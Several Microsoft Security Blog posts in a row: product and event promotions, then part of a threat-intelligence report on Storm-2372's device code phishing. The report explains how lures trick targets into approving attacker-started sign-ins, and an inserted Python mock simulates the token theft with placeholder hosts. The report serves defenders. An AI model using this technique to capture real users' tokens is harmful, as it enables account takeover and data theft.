As organizations work toward a Zero Trust model, secure remote assistance must align with core security principles. This means moving beyond reactive security measures and embedding proactive, policy-driven controls into every remote session. Microsoft Intune Remote Help was designed with these imperatives in mind, providing a robust solution that enhances IT support while minimizing security risks.
While legacy remote assistance tools can lack enterprise-grade security controls, Remote Help is built to align with Zero Trust principles. Unlike traditional solutions, Remote Help:
- Integrates directly with Microsoft Entra ID—enhancing security where authentication and access controls can consistently take place.
- Provides session transparency—IT teams can track and monitor remote assistance activity in real time.
- Enforces compliance requirements—only compliant, managed devices can participate in remote assistance sessions.
For highly regulated industries, Remote Help offers an alternative to third-party tools that may introduce security blind spots. By embedding security directly into remote assistance workflows, organizations can significantly reduce the risk of unauthorized access.
Start a free trial of Microsoft Intune Remote Help
Engaging customers and partners to strengthen cyber resilience
Cybersecurity is a team sport. As cyberthreat actors grow more sophisticated, collaboration across industries is essential. Microsoft is committed to engaging with customers and partners to drive security innovation and resilience. Initiatives such as the Windows Resiliency Initiative (WRI) focus on:
- Reducing the need for admin privileges—helping organizations adopt a least privilege approach at scale.
- Enhancing identity protection—strengthening defenses against phishing and identity-based attacks.
- Quick machine recovery—empowering IT teams with tools to rapidly restore compromised devices remotely.
By fostering collaboration and continuously evolving security measures, Microsoft is helping organizations stay ahead of emerging cyberthreats. These ongoing conversations with our customers and partners are crucial in shaping resilient security strategies that adapt to an ever-changing cyberthreat landscape.
A security-first approach for the future
The increasing reliance on remote assistance demands a security-first mindset. Organizations must recognize that every remote access session presents an opportunity for exploitation from an ever-evolving cast of cyberattackers. Rather than treating security as an afterthought, it must be deeply integrated into the architecture of the remote assistance solutions. A modern approach requires proactive risk mitigation, continuous verification, and seamless security controls that support productivity without compromising protection.
Now is the time for IT and security leaders to:
- Evaluate your current remote assistance tools—identifying the gaps and areas for improvement.
- Adopt Zero Trust principles—ensuring that access is explicitly verified and continuously monitored.
- Leverage solutions like Microsoft Intune and Remote Help—deploying secure, enterprise-grade remote assistance capabilities.
By taking these steps, you can strengthen your security posture, minimize risk, and ensure that remote assistance remains a tool for operational efficiency rather than a gateway for cyberthreats.
To explore how Zero Trust can enhance your remote assistance security, visit the Zero Trust Workshop, an interactive, step-by-step guide to embedding security into every layer of IT operations, ensuring a comprehensive and measurable approach to security transformation.
Explore the Zero Trust Workshop
Learn more with Microsoft Security
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
The post Rethinking remote assistance security in a Zero Trust world appeared first on Microsoft Security Blog.
Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview
Generative AI is reshaping almost every industry, and the legal field is no different. A Thomson Reuters Institute study of legal professionals found “a remarkable 79% of law firm respondents anticipate AI will have a high or transformational impact on their work within the next five years—a significant 10-point increase from 2023.”1 There are many promising opportunities to streamline workflows and drive efficiency by bringing AI into legal and litigation workflows. Simultaneously, there’s a need to ensure data compliance, security, governance, and privacy while deploying AI throughout your organization.
Learn more about Microsoft Security.
Microsoft is continuously innovating, empowering people and organizations to achieve more, and Microsoft Purview is a key part of that mission. New advanced capabilities in Microsoft Purview eDiscovery make it easier to safeguard and manage compliance of data. eDiscovery allows you to easily search, collect, and review AI-based interactions across more than 25 AI applications. It also uses advanced AI capabilities to streamline eDiscovery workflows—from natural language queries for more intuitive searching to automatic case summarization for a quick snapshot of key insights. And more powerful AI-driven features are on the horizon to further accelerate and simplify the eDiscovery process.
We are excited to share more about new developments across Microsoft Security at Legalweek 2025. If you are attending the conference in New York City from March 24 to March 27, 2025, we’d love to connect. Read on for an overview of our sessions. And request to attend our Executive Breakfast on Tuesday, March 25, 2025, from 7:30am–8:45am (ET) at the Mercury Ballroom, New York Hilton Midtown, to learn how to protect Microsoft 365 Copilot with Microsoft Purview as well as our latest developments in eDiscovery.
Mark your calendar for these Legalweek sessions
At Legalweek 2025, we will have experts from Microsoft and the legal field to offer insights into the latest cybersecurity challenges facing the legal sector as well as strategies to tackle these pressing issues.
Session title: Trustworthy AI: Helping to ensure privacy and security in AI transformation
Speakers: Katelyn Rothney, Senior Product Marketing Manager, Microsoft Azure AI; Ashley Pusey, Cyber Security and Data Privacy Associate, Kennedy’s CMP LLP; Rebecca Engrav, co-chair of the AI industry group at Perkins Coie; and John Israel, Global AI Security and Data Security Lead, KPMG.
Session date and time: Tuesday, March 25, 2025, 11:30 AM–12:30 PM Eastern Time (ET)
Session description: This session will delve into the complex interplay between AI innovation and data protection, exploring the necessary frameworks for designing AI solutions that prioritize transparency, integrity, and accountability. Learn the security and privacy risks inherent in AI adoption and how to mitigate them.

Session title: Global compliance deep dive: Mastering the EU AI Act and international data regulations
Speakers: Manny Sahota, Director of Global Cloud Privacy, Regulatory Risk, and Compliance, Microsoft; Dajin Li, Partner, Taylor Wessing; Jennifer Driscoll, Partner, Robinson Cole; Jessica Long, Vice President, Head of Legal, Chief Privacy Officer, Allstate Canada; and Patrick J. Austin, Of Counsel, Woods Rogers.
Session date and time: Tuesday, March 25, 2025, 2:00 PM–3:00 PM (ET)
Session description: Navigate the complexities of global data compliance and learn how to stay ahead of regulatory requirements with an in-depth analysis of the EU AI Act and other key international regulations. Learn how to harmonize compliance strategies across different jurisdictions, overcome regulatory challenges, and future-proof your organization’s data governance framework.

Session title: Collaboration in complex litigation: Streamlining team communication and document sharing
Speakers: EJ Bastien, Sr. Director, Discovery Programs, Microsoft; Lindsey Lanier, Director, Product Management, Relativity; Candi Smith, eDiscovery Analyst, Disney; Scott Milner, Partner & Global Practice Group Leader of eData, Morgan, Lewis & Bockius LLP; and Greg Buckles, Market Analyst–Press, eDiscovery Journal.
Session date and time: Tuesday, March 25, 2025, 3:30 PM–4:30 PM (ET)
Session description: Explore how legal teams can streamline document sharing and optimize communication workflows to keep all stakeholders connected and informed. Learn how to simplify case management, enhance team collaboration, and make information easily accessible—even in hybrid work environments.

Session title: Navigating the AI revolution: Strategic insights and innovations
Speakers: Jessica Escalera, Head of Legal Operations, Americas at HSBC; Nicole Langston, Head of eDiscovery, Counsel for Barclays; Nisha Narasimhan, Principal Product Manager, Microsoft; and Robert Keeling, Partner, Redgrave LLP.
Session date and time: Wednesday, March 26, 2025, 11:30 AM–12:30 PM (ET)
Session description: This forward-looking panel discussion delves into how you can use cutting-edge products to steer your AI journey effectively. Join industry experts as they share insights on strategic approaches, address common challenges, and highlight the latest AI innovations.

Connect with Microsoft at Legalweek
If you seek strategies for safeguarding and managing the compliance of your data and AI applications, check out one or more of our sessions at Legalweek. Throughout the conference, you can also interact with our Microsoft experts directly in a few ways:
- Stop by Booth #3103 in New York Hilton Midtown Americas Hall 2 to learn how Microsoft solutions can address your challenges.
- Request to attend the Executive Breakfast on Tuesday, March 25, 2025 from 7:30am – 8:45am ET at Mercury Ballroom, New York Hilton Midtown.
- Request dedicated time with our experts, who will be available in meeting rooms at 1700 Broadway, between 9:00 AM – 6:00 PM ET, Monday, March 24, 2025, through Thursday, March 27, 2025. We’d love to connect. Hope to see you there!
At Microsoft we truly believe security is a team sport. And we are thrilled to welcome three of our strategic Microsoft Intelligent Security Association (MISA) members to demonstrate their solutions at the Microsoft booth. Join Epiq Global, Lighthouse, and Relativity as they share their expertise and discuss how their solutions—together with Microsoft technology—are helping our mutual customers secure their data efficiently in the age of AI.
- Epiq Global: Tuesday, March 25, 2025, 12:00 – 2:00 PM ET
- Lighthouse: Wednesday, March 26, 2025, 2:30 – 4:30 PM ET
- Relativity: Thursday, March 27, 2025, 10:00 AM – 12:00 PM ET
Read more about MISA and membership benefits.
Learn more about Microsoft Security solutions
To help your organization efficiently respond to legal matters or internal investigations with intelligent capabilities that reduce data to only what’s relevant, learn more about Microsoft Purview eDiscovery.
Learn how to accelerate the secure adoption of AI with ready-to-go security and governance tools built for generative AI at The Microsoft at RSAC experience. From our signature Pre-Day to demos and networking, discover how Microsoft Security can give you the advantage you need in the era of AI.
To learn more about Microsoft Security, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
Sources:
1 The Future of Professionals: How AI is impacting the legal profession | Legal Blog
The post Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview appeared first on Microsoft Security Blog.
Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms
Critical infrastructure is a key target of both physical and cyberattacks. Microsoft has observed an increase in reported attacks on internet-exposed operational technology (OT) devices that control real-world critical processes—like water and wastewater systems, as well as critical functions across industries including healthcare, manufacturing, energy, and more.1 Our previous Microsoft Digital Defense Reports have shown that unfortunately the security of OT devices has not kept pace with the strengthened security of IT hardware and software. As of July 2024, we had identified and shared more than 300 vulnerabilities in third-party OT applications. The initiative contributed to significant improvements in security across the OT industry.1 It highlights a need for organizations to integrate OT devices into their broader endpoint security strategy.
We are excited to announce that Gartner has named Microsoft a Leader in the 2025 Gartner® Magic Quadrant™ for Cyber Physical Systems Protection Platforms. Gartner defines cyber-physical systems (CPS) as “engineered systems that orchestrate sensing, computation, control, networking and analytics” that connect the digital and physical worlds. They span industrial control systems (ICS), OT devices, Internet of Things (IoT) devices, and more.
CPS devices are an inherent component of any security strategy. As the only security platform vendor now recognized as a Leader in both endpoint and CPS security, we believe this recognition highlights our commitment to providing customers with holistic endpoint security on any platform. Our cross-platform strategy is key to making continued progress in helping organizations protect their endpoints against the latest and most sophisticated cyberattacks as they span operating systems and cross into CPS infrastructure, while driving continued efficiency for security operations center (SOC) teams. Read the report here.
Meeting the unique OT security needs of organizations in every major industry
The core of Microsoft’s CPS offering to help secure OT environments is Microsoft Defender for IoT, which provides CPS capabilities through purpose-built sensors and, combined with Defender for Endpoint, helps provide holistic endpoint security to organizations worldwide. Both are native components of our unified security operations platform.
CPS security is deeply embedded into Microsoft’s approach to securing devices across the platforms our customers operate on. Defender for Endpoint uses its network traffic insights to discover devices, which it centralizes in a unified device inventory; we provide holistic vulnerability management for software on both user devices and CPS devices, and bring the information together in a unified incident investigation experience so that analysts can investigate endpoint-focused attacks end to end.
Further, Microsoft is deeply committed to helping customers achieve cost efficiencies through our strategic Microsoft 365 E5 Security bundles, while equally allowing maximum purchasing flexibility through our standalone offers for each solution.
Secure your enterprise IoT devices with Microsoft Defender for IoT
Innovations that drive better defense strategies
Over the last 12 months, Microsoft has delivered significant innovations that help defenders gain the upper hand against OT and other cyberthreats, including:
Microsoft’s unified security operations platform brings the foundational tools a SOC needs into a single experience, with a consistent data model, unified capabilities, and broad protection. This unified experience helps SOCs close critical security gaps and streamline their operations, delivering better overall protection, reducing their response time by 88%, and improving overall efficiency.2 Defender for IoT is core to this platform, which combines the power of leading solutions in security information and event management (SIEM), extended detection and response (XDR), and generative AI for security. It enables security teams to detect and respond to cyberthreats across OT environments, gain key insights into their OT security posture, and understand detected cyberthreats in the context of broader incidents.
The unified agent combines protection across endpoints, OT devices, identities, and data loss prevention (DLP) to help security teams streamline deployment and protection. The sensor is the software component that monitors and protects critical infrastructure, serving as one of the first lines of defense against cyberthreat actors. With our platform approach that brings together Microsoft Sentinel and Microsoft Defender XDR, we now have the first platform-level agent that unifies protection across four solution areas. The streamlined agent simplifies how you activate and manage core capabilities so you can more easily and swiftly reap the benefits of our AI-powered protection. Read more about the unified agent platform on the Microsoft Defender for Endpoint blog.
Microsoft Security Exposure Management is part of the unified security operations portal and provides a unified view of security posture across company assets and workloads. Security initiatives are an experience that provides a simple way to assess security readiness for a specific security area or workload, and to constantly track and measure exposure risk over time. The OT Security initiative improves your OT site security posture by monitoring and protecting OT environments in the organization, and employing network layer monitoring. This initiative identifies devices and ensures that systems are working correctly, and data is protected. Your security teams can use the OT Security initiative to identify unprotected devices and harden posture across sites through vulnerability assessments, with actionable guidance to help remediate at-risk devices. Read more about security initiatives.
Reduce risk and optimize your security posture with Microsoft Security Exposure Management
Thank you to all our customers. You inspire us as together we work to create a safer world.
Learn more with Microsoft Security
Visit Microsoft Defender for IoT to learn how your organization can get real-time asset discovery, vulnerability management, and cyberthreat protection for your Internet of Things (IoT) and industrial infrastructure, such as industrial control systems (ICS) and operational technology (OT).
Are you a regular user of Microsoft Defender for Endpoint or Defender for IoT? Review your experience on Gartner Peer Insights™ and get a $25 gift card.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1 Microsoft Digital Defense Report, Microsoft, 2024.
2 The Total Economic Impact™ Of Microsoft SIEM And XDR, August 2022.
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.
Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.
Gartner, Magic Quadrant for CPS Protection Platforms, 17 February 2025, By Katell Thielemann, Wam Voster, Ruggero Contu.
The post Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms appeared first on Microsoft Security Blog.
Join us for the end-to-end Microsoft RSAC 2025 Conference experience
AI adoption is picking up speed. Many companies are growing their technology estates by embracing powerful new solutions like generative AI. But to maximize the benefits of new technology with confidence, security professionals need to stay compliant with the evolving regulatory and audit requirements in the age of AI. It is in this spirit that Microsoft invites you to join us at RSAC™ 2025 Conference in San Francisco, where we will showcase end-to-end security designed to help organizations accelerate the secure adoption of AI with ready-to-go security and governance tools and solutions to multiply security teams’ productivity.
Across the Microsoft Security portfolio, our innovations, together with world-class threat and regulatory intelligence, will help give security experts the advantage they need in the era of AI. From our signature Pre-Day to hands-on demos and one-on-one meetings, join the Microsoft experience at RSAC 2025 designed just for you.
Microsoft at RSAC
From our signature Pre-Day to hands-on demos and one-on-one meetings, discover how Microsoft Security can give you the advantage you need in the era of AI.
Explore events
Kick things off at Microsoft Pre-Day
The Microsoft experience at RSAC 2025 begins with Microsoft Pre-Day on Sunday, April 27, 2025, at the Palace Hotel, just around the corner from the Moscone Center. For the fourth year running, the keynote speech held on Microsoft Pre-Day will kick off the full lineup of Microsoft events and activities throughout RSAC 2025. By joining us on Sunday, you’ll have the chance to hear directly from Microsoft Security business leaders—including Vasu Jakkal, Corporate Vice President, Microsoft Security Business; Charlie Bell, Executive Vice President, Microsoft Security; Sherrod DeGrippo, Director of Threat Intelligence Strategy; and other Microsoft Security leaders as they share reporting on emerging cyberthreat trends and the product innovations designed to protect against them. Vasu will also take the RSAC 2025 stage on Day 1 for the conference keynote.
At Pre-Day, attendees will hear Microsoft Security threat intelligence on emerging trends, explore new AI-first tools, demos, and best practices, and attain a better understanding of how Microsoft can help them secure and govern their AI deployments. Attend to discover how the adaptive, end-to-end security platform from Microsoft, including Microsoft Security Copilot, can help your team catch what others miss, speed up remediation, lower your total cost of ownership, and boost—rather than burden—you and your teams.
Stick around after Pre-Day for the reception—an evening of fun, networking, and entertainment, celebrating the vibrant security community. This is a unique opportunity to meet Microsoft security leaders, expand your professional network, and learn how others are addressing the latest security trends and challenges. Light refreshments will be served. CISOs who register to attend Microsoft Pre-Day will automatically be invited to a chief information security officer (CISO) dinner with Vasu Jakkal.
Make sure to register for Microsoft Pre-Day to join in on all the day’s activities.
Register for Microsoft Pre-Day at RSAC 2025
Dedicated calendar of events for CISOs
Microsoft will be hosting a number of events tailored to CISOs throughout RSAC 2025. To kick off the week, Microsoft will be hosting a Pre-Day, followed by the exclusive CISO dinner on April 27, 2025. Following that, there will be daily lunch and learn opportunities that address some of the primary challenges facing CISOs’ organizations:
- Monday April 28, 2025: Innovating Securely CISO Lunch—Learn insights concerning secure innovation centered around the new AI regulations, including the EU Act, Digital Operational Resilience Act (DORA), and more.
- Tuesday April 29, 2025: SFI Executive Lunch—Open to all and focused around the needs of Latin America-based CISOs, this lunch will bring together leaders and experts interested in understanding the latest Secure Future Initiative (SFI) progress and exchanging their thoughts on related best practices.
- Wednesday April 30, 2025: Embracing Cyber resilience CISO Lunch—Attendees are invited to network, learn, and exchange their insights regarding cyber resilience as the AI landscape evolves.
Finally, CISOs who attend RSAC 2025 are invited to stay through the end of the conference to attend the Microsoft Post-Day Forum at the Microsoft Experience Center at Silicon Valley on Thursday, May 1, 2025, from 9:00 AM PT to 1:00 PM PT. The day will be full of insightful presentations, interactive discussions, networking opportunities, and a curated CISO roundtable session. This informative day will also include an immersive tour of the unique state-of-the-art Microsoft Experience Center, which highlights larger-than-life solutions that show Microsoft’s cutting-edge technology solving many of today’s challenges. This experience is facilitated by envisioning specialists who spark inspired conversations, creative ideas, and new opportunities for leaders to participate in before returning home.
Sign up for Microsoft experiences at RSAC, including the Pre-Day, the CISO dinner, CISO lunch, and the Post-Day Forum. Request a one-on-one meeting with Microsoft experts to discuss your most pressing questions here.
Discover solutions to your challenges during the keynote speech and Microsoft sessions
As part of the RSAC agenda, Vasu Jakkal will take the stage on Monday, April 28, 2025, at 4:40 PM PT. During the speech, she will discuss the potential of agentic workflows to dramatically reshape the security landscape. Agentic AI has the power to enable more complex problem-solving, deeper agent collaboration, and iterative learning. All of this leads us toward a previously unheard-of new paradigm for security. Join Vasu Jakkal for an imaginative look at the future of AI security agents and how the people of our security teams will work alongside them to change the game.
After the keynote and throughout the conference, attendees will be able to split their time between the Microsoft Security sessions included in the RSAC 2025 agenda, live demonstrations at booth #5744 in Moscone North, and a variety of roundtables, one-on-one meetings, and presentations at the Microsoft Security Hub at the Palace Hotel.
Here are two sessions not to miss:
- Tuesday, April 29, 2025, at 9:40 AM PT: Shaping the Future of Security with Agentic AI—In a time of rapidly evolving cyberthreats, agentic AI is emerging as a transformative force in security. Join Dorothy Li, Corporate Vice President of Microsoft Security Copilot and Marketplace, to discover how autonomous decision-making is reshaping our approach to cybersecurity. This session will reveal how agentic AI empowers organizations to proactively mitigate risks, enhance operational efficiency, and elevate the effectiveness of your security tools. Attendees will gain actionable insights and practical strategies for harnessing the potential of agentic AI. Prepare to rethink the future of security and position your organization at the forefront of innovation.
- Wednesday, April 30, 2025, at 9:40 AM PT: Accelerate AI Adoption with Stronger Security—AI adoption is accelerating, creating both new opportunities and security challenges. Led by Neta Haiby, Partner Product Manager at Microsoft, this session covers key AI adoption trends, emerging risks, and common cyberthreats. Discover actionable steps to secure and govern AI, from establishing a dedicated security team for AI to adopting AI-specific solutions, ensuring your organization can innovate with confidence.
Other well-known Microsoft experts will host sessions sharing what they’ve learned from their work pioneering and securing AI:
- Wednesday, April 30, 2025 at 8:30 AM PT: Guardians of the Cyber Galaxy: Allies Against AI-Powered Cybercrime by Sean Farrell, Assistant General Counsel, Digital Crimes Unit.
- Monday, April 28, 2025 at 1:10 PM PT: AI Era Authentication: Securing the Future with Inclusive Identity by Abhilasha Bhargav-Spantzel, Partner Security Architect, and Aditi Shah, Senior Data and Applied Scientist.
- Tuesday, April 29, 2025, at 8:30 AM PT: AI Safety: Where Do We Go From Here? by Ram Shankar Siva Kumar, Principal Research Lead, AI Red Team Lead.
- Tuesday, April 29, 2025, at 2:25 PM PT: Lessons Learned from a Year(ish) of Countering Malicious Actors’ Use of AI by Sherrod DeGrippo, Director, Threat Intelligence Strategy.
At the Microsoft booth, attendees will have the chance to engage with experts, discover ready-to-go security and governance tools built for generative AI, and watch theater sessions showcasing the latest products, innovations, and industry perspectives from Microsoft. They’ll also get to enjoy a fun and interactive gaming experience.
Microsoft product and partner experts will be on hand to showcase the newest advancements through captivating demonstrations, informative videos, and valuable resources.
Visit the Microsoft booth theater for exclusive 20-minute demos and expert-led sessions on the latest in security and AI. Explore strategies to protect, govern, and secure AI. Listen in to insights on identity, compliance, privacy, threat defense, data protection, and more. Don’t miss this opportunity to learn from industry leaders and stay ahead in the ever-evolving security landscape.
Meetings and connections at the Microsoft Security Hub
The historic and luxurious Palace Hotel is home base for Microsoft during the week. RSAC 2025 attendees are invited to meet with Microsoft experts and executives, attend thought leadership sessions and roundtable lunches, and join networking opportunities. Detailed information about individual sessions can be found on the Microsoft Security Experiences at RSAC 2025 Landing Page.
Customers are also invited to deepen their understanding of the latest cybersecurity threats, trends, and developments by discussing their most important security product and threat intelligence questions directly with Microsoft security experts through scheduled one-on-one meetings, held from Monday, April 28, 2025, to Wednesday, April 30, 2025, at the Palace Hotel. Request your meeting directly through the Microsoft Security Experiences at RSAC 2025 Home Page.
Microsoft Intelligent Security Association featured partners
The Microsoft Intelligent Security Association (MISA) will once again have a considerable presence at RSAC 2025. MISA partners will be featured in the Microsoft Booth #5744 and included in other events happening throughout the week. Additionally, the sixth annual Microsoft Security Excellence Awards, presented by MISA, will be held at the Palace Hotel in San Francisco on April 28, 2025, celebrating our finalists and announcing winners in nine award categories as well as enjoying a time of connecting.
Activities include:
- MISA demo station: Stop by the Microsoft Booth to explore the innovative solutions developed by MISA members, which integrate Microsoft Security technology.
- Theater sessions: Attend one or more of our five theater sessions at the Microsoft booth, led by MISA members, focusing on partner strategies and solutions for cyberthreat protection.
- View the MISA demo and theater schedule.
- MISA Partner awards: MISA members are invited to attend the Microsoft Security Excellence Awards on Monday, April 28, 2025, where winners will be announced in nine security award categories.
Microsoft Post-Day Forum is a unique experience designed to help customers, CISOs, and security leaders dive deep into new concepts, ask questions they need answered about product features, and prepare to realize and enable the AI-first, end-to-end security concepts they’ve learned about throughout RSAC 2025. The Microsoft Post-Day Forum, hosted by Microsoft Security executives, will be held on Thursday, May 1, 2025, from 10:00 AM PT to 1:00 PM PT, at the Silicon Valley Experience Center. Pick up for the event will be held at the Palace Hotel at 8:00 AM PT, with drop off organized for 2:00 PM PT.
We look forward to seeing you at RSAC 2025!
Learn more about the Microsoft experience at RSAC 2025
Customers and partners can register for the events highlighted in this blog as well as other Microsoft ancillary events and more here.
Explore Microsoft Security events at RSAC 2025
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
The post Join us for the end-to-end Microsoft RSAC 2025 Conference experience appeared first on Microsoft Security Blog.
Storm-2372 conducts device code phishing campaign
Executive summary
Today we’re sharing that Microsoft discovered cyberattacks being launched by a group we call Storm-2372, who we assess with medium confidence aligns with Russia’s interests and tradecraft. The attacks appear to have been ongoing since August 2024 and have targeted governments, NGOs, and a wide range of industries in multiple regions. The attacks use a specific phishing technique called “device code phishing” that tricks users into logging into productivity apps while Storm-2372 actors capture the information from the login (tokens), which they can then use to access the compromised accounts. These tokens are part of an industry standard and, while these phishing lures used Microsoft and other apps to trick users, they do not reflect a vulnerability unique to Microsoft, nor have we found any vulnerabilities in our code base enabling this activity.
Microsoft Threat Intelligence Center discovered an active and successful device code phishing campaign by a threat actor we track as Storm-2372. Our ongoing investigation indicates that this campaign has been active since August 2024 with the actor creating lures that resemble messaging app experiences including WhatsApp, Signal, and Microsoft Teams. Storm-2372’s targets during this time have included government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 aligns with Russian interests, victimology, and tradecraft.
In device code phishing, threat actors exploit the device code authentication flow to capture authentication tokens, which they then use to access target accounts, and further gain access to data and other services that the compromised account has access to. This technique could enable persistent access as long as the tokens remain valid, making this attack technique attractive to threat actors.
The phishing attack identified in this blog masquerades as Microsoft Teams meeting invitations delivered through email. When targets click the meeting invitation, they are prompted to authenticate using a threat actor-generated device code. The actor then receives the valid access token from the user interaction, stealing the authenticated session.
Because of the active threat represented by Storm-2372 and other threat actors exploiting device code phishing techniques, we are sharing our latest research, detections, and mitigation guidance on this campaign to raise awareness of the observed tactics, techniques, and procedures (TTPs), educate organizations on how to harden their attack surfaces, and disrupt future operations by this threat actor. Microsoft uses Storm designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we reach high confidence about the origin or identity of the threat actor behind the activity.
Microsoft Threat Intelligence Center continues to track campaigns launched by Storm-2372, and, when able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. Microsoft is also tracking other groups using similar techniques, including those documented by Volexity in their recent publication.
How does device code phishing work?
The device code authentication flow (the OAuth 2.0 device authorization grant, RFC 8628) exists for input-constrained devices that cannot run an interactive web sign-in. The device requests a short numeric or alphanumeric code from the identity provider and displays it; the user enters that code on a sign-in page on another device, such as a phone or laptop, authenticates there, and the original device then receives tokens for the account. In device code phishing, threat actors abuse this flow: the “device” that starts it is the attacker’s own client.
During the attack, the threat actor generates a legitimate device code request and tricks the target into entering the resulting user code on a legitimate sign-in page. Once the target authenticates, the identity provider issues the authentication tokens (access and refresh) to the actor’s client, and the actor uses them to access the target’s accounts and data. Because the tokens are the product of a completed sign-in, the actor can also use them to reach other services the user has permissions to, such as email or cloud storage, without ever knowing a password. Access persists for as long as the tokens remain valid, and a refresh token lets the actor keep obtaining new access tokens. The actor can then use the valid access token to move laterally within the environment.
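The exchange described above, as an added example that is not part of the original post and not Microsoft’s code: a small in-memory model of the OAuth 2.0 device authorization grant (RFC 8628) with the messages each side sends at each step. The verification URI, client ID, scopes and user principal name are placeholders chosen for the demonstration. The point it makes is that the client polling for the token never presents a password or an MFA proof; whatever the victim completes on the genuine sign-in page is what the attacker receives.

```python
"""Toy model of the OAuth 2.0 Device Authorization Grant (RFC 8628), showing how a
phished user code yields the victim's tokens. In-memory stand-in, not Entra ID."""
import secrets
import string

VERIFICATION_URI = "https://idp.example/devicelogin"   # assumed placeholder, not a real endpoint


class MockAuthServer:
    """Holds device-code requests and answers the three steps of the flow.
    Time is a counter the caller advances, so expiry can be demonstrated offline."""

    def __init__(self, lifetime=900, interval=5):
        self.now = 0
        self.lifetime = lifetime
        self.interval = interval
        self._by_device_code = {}
        self._by_user_code = {}

    def device_authorization(self, client_id, scope):
        """RFC 8628 s3.1/3.2: the client (here, the attacker) starts the flow and gets
        a long device_code for itself and a short user_code to hand to the victim."""
        device_code = secrets.token_urlsafe(32)
        alphabet = string.ascii_uppercase + string.digits
        user_code = "".join(secrets.choice(alphabet) for _ in range(9))
        rec = {"client_id": client_id, "scope": scope, "approved_by": None,
               "expires_at": self.now + self.lifetime, "last_poll": None}
        self._by_device_code[device_code] = rec
        self._by_user_code[user_code] = rec
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": VERIFICATION_URI,
                "expires_in": self.lifetime, "interval": self.interval}

    def user_enters_code(self, user_code, upn):
        """RFC 8628 s3.3: the user opens the genuine sign-in page, authenticates
        (password, MFA, whatever the tenant requires) and types the user_code.
        The phish only has to make this step look like joining a meeting."""
        rec = self._by_user_code.get(user_code)
        if rec is None or self.now >= rec["expires_at"]:
            return {"status": "invalid_or_expired_code"}
        rec["approved_by"] = upn
        return {"status": "ok", "client_id": rec["client_id"], "scope": rec["scope"]}

    def token(self, client_id, device_code):
        """RFC 8628 s3.4/3.5: the client polls with the device_code only. No password
        or MFA proof from the client is involved; approval happened in the user's browser."""
        rec = self._by_device_code.get(device_code)
        if rec is None or rec["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if self.now >= rec["expires_at"]:
            return {"error": "expired_token"}
        if rec["last_poll"] is not None and self.now - rec["last_poll"] < self.interval:
            return {"error": "slow_down"}
        rec["last_poll"] = self.now
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self._by_device_code[device_code]          # the grant is single-use
        return {"token_type": "Bearer", "scope": rec["scope"], "sub": rec["approved_by"],
                "access_token": secrets.token_urlsafe(24),
                "refresh_token": secrets.token_urlsafe(24)}


def simulate_phish(server, victim_upn="victim@contoso.example",
                   client_id="attacker-chosen-public-client"):
    """Walk the attack: attacker starts the flow, the lure carries user_code as the
    'meeting ID', the victim approves on the real page, the attacker collects tokens."""
    start = server.device_authorization(client_id, "Mail.Read offline_access")
    pending = server.token(client_id, start["device_code"])     # before the victim acts
    server.now += 120                                           # victim reads the invite
    approval = server.user_enters_code(start["user_code"], victim_upn)
    server.now += server.interval                               # next poll
    tokens = server.token(client_id, start["device_code"])
    return start, pending, approval, tokens


if __name__ == "__main__":
    start, pending, approval, tokens = simulate_phish(MockAuthServer())
    print("user_code carried by the lure:", start["user_code"])
    print("poll before approval:", pending, "| user step:", approval["status"])
    print("attacker now holds tokens for", tokens["sub"])
```

The model also shows the two limits a defender relies on: the code expires after expires_in seconds and the grant is single-use, so the window between lure and sign-in is bounded, which is why the hunting query later in this post correlates a click with a sign-in within minutes.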
Figure 1. Device code phishing attack cycle
Storm-2372 phishing lure and access
Storm-2372’s device code phishing campaign has been active since August 2024. Observed early activity indicates that Storm-2372 likely targeted potential victims through third-party messaging services including WhatsApp, Signal, and Microsoft Teams, falsely posing as a prominent person relevant to the target to develop rapport before sending subsequent invitations to online events or meetings via phishing emails.
Figure 2. Sample messages from the threat actor posing as a prominent person and building rapport on Signal
The invitations lure the user into completing a device code authentication request that emulates the experience of the messaging service, which gives Storm-2372 initial access to victim accounts and enables Graph API data collection activities such as email harvesting.
Figure 3. Example of lure used in phishing campaign
On the device code authentication page, the user is tricked into entering the code that the threat actor included as the meeting ID in the fake Teams meeting invitation.
Post-compromise activity
Once the victim uses the device code to authenticate, the threat actor receives a valid access token. The threat actor then uses this valid session to move laterally within the newly compromised organization, sending additional phishing messages containing device code authentication links to other users through intra-organizational emails originating from the victim’s account.
Figure 4. Legitimate device code authentication page
